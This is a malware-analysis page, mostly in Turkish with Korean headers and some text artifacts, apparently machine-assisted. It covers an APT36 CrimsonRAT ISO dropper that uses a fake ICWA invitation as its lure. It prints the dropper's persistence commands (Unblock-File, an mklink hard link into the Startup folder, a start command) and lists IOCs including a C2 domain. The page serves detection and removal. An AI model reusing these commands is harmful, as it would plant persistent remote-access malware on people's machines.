Manuel Statik Analiz (LLM Okumali) — CrimsonRAT ISO Dropper | Tehdit: KRITIK
APT36 Kampanyasi Tespit Edildi
Bu ornek, APT36 (Transparent Tribe) tarafindan Hindistan merkezli duyu tank kuruluslarina (ICWA — Indian Council of World Affairs) yonelik hedefli bir siber saldiri kampanyasinin parcasidir. Haziran 2026 tarihli lure dosyasi, aktif kampanya oldugunu dogrulamaktadir.

파일 Kimligi

SHA2568690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61
Orijinal AdInvitation-Letter-Fazel-Mumbai-House-ICWA-Jun-2026.iso
크기4.784.128 byte (~4.5 MB)
FormatISO 9660 CD-ROM imaji

Teslimat Vektoru — ICWA Davet Mektubu Sahteligi

ISO dosyasi, Haziran 2026 tarihli ICWA (Indian Council of World Affairs) davet mektubu olarak sunulmaktadir. Bu tur hedefli phishing (spear-phishing) APT36'nin Hindistanli savunma ve dis politika personeline yonelik tipik TTL'leriyle (Taktik, Teknik, Prosedur) uyumludur. "Fazel Mumbai House" referansi somut bir sosyal muhendislik bilesenini gostermektedir.

Teknik Analiz — Zarli ISO Icerigi

ISO icindeki dosyalar: TLauncher.exe (Minecraft launcher kili#62;), ImgBurn kurulumu, ve C:\ProgramData\z olarak birakilan CrimsonRAT payload.

Tespit Edilen Komutlar (Binary String)

powershell Unblock-File -Path "C:\ProgramData\z"
mklink /h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\TLauncher.exe" "C:\ProgramData\z" >nul
start "" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\TLauncher.exe" && EXIT

Analiz Adim Adim

  1. ISO Bağlanir: Kurban ISO'yu tıklar, Windows otomatik olarak bağlar.
  2. TLauncher kili#62;: Kurban meşru bir Minecraft launcher sandığını düsünür.
  3. PowerShell Bypass: Unblock-File komutu ile indirme engeli kaldirilir.
  4. Kalicilik: C:\ProgramData\z adli payload, Startup klasorune TLauncher.exe adi altinda sabit baglanti (hard link) olarak eklenir.
  5. Yürütme: Payload calistirilir ve sistem yeniden baslatildiginda da otomatik olarak calisir.

C2 Altyapisi

CrimsonRAT C2 URL'si binary icerisinde sifreli olarak saklanmaktadir. ISO icindeki TLauncher bileseninden http://java-for-minecraft.com/ URL'si tespit edilmis; bu adres Java kurulumu rehber linki olarak kullanilmaktadir. Asil CrimsonRAT C2 endpoint'i statik analizde gorunur degildir.

IOC

SHA2568690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61
ISO AdiInvitation-Letter-Fazel-Mumbai-House-ICWA-Jun-2026.iso
Payload YoluC:\ProgramData\z
Kalicilik Yolu%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\TLauncher.exe
PowerShell KomutuUnblock-File -Path "C:\ProgramData\z"
C2Sifrelenmis (dinamik analiz gerekli)
Hedef KurumICWA — Hindistan dis politika think-tank

Bilinen CrimsonRAT Yetenekleri

  • Tam uzaktan erisim (dosya yonetimi, komut yürütme)
  • Ekran goruntüsü alma
  • Keylogger
  • Tarayici kimlik bilgileri calma
  • 파일 yükleme/indirme
  • Process yonetimi

Nasil Kaldirilir?

  1. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ altindaki TLauncher.exe silinsin
  2. C:\ProgramData\z dosyasi silinsin
  3. Registry Run key'leri kontrol edilsin
  4. Guncel AV taramasi yapilsin

CrimsonRAT — 악성코드 프로필

CrimsonRAT APT36 Transparent Tribe Pakistan 2017. ICWA Mumbai Hindistan diplomatik lure. java-for-minecraft.com. .NET+Delphi.

악성코드 유형
RAT
프로그래밍 언어
.NET
C2 프로토콜
TCP
대상 시스템
Hindistan, Pakistan — hukumet, savunma, think-tank

기능 및 동작

Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması

IOC 목록 (1 개 지표)

IOC — CrimsonRAT
# SHA256 8690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61
유형메모
sha256 8690354fb8a8e640e586b8022392aef9bd58519e4aa9c70f697b82db74ba7d61

C2 서버 (이 패밀리에 대해 2개의 서버 기록)

주소 유형 포트 프로토콜 상태 국가
java-for-minecraft.com domain 80 HTTP active —
java-for-minecraft.com domain 80 HTTP active —

C2 주소는 KEYDAL 팀이 수동으로 검증한 악성코드 샘플에서만 제공됩니다. 상업적 사용은 금지됩니다.

태그
crimsonratapt36iso-droppertlauncher-lurepowershell-bypassindia-targetaptsaldiriicwa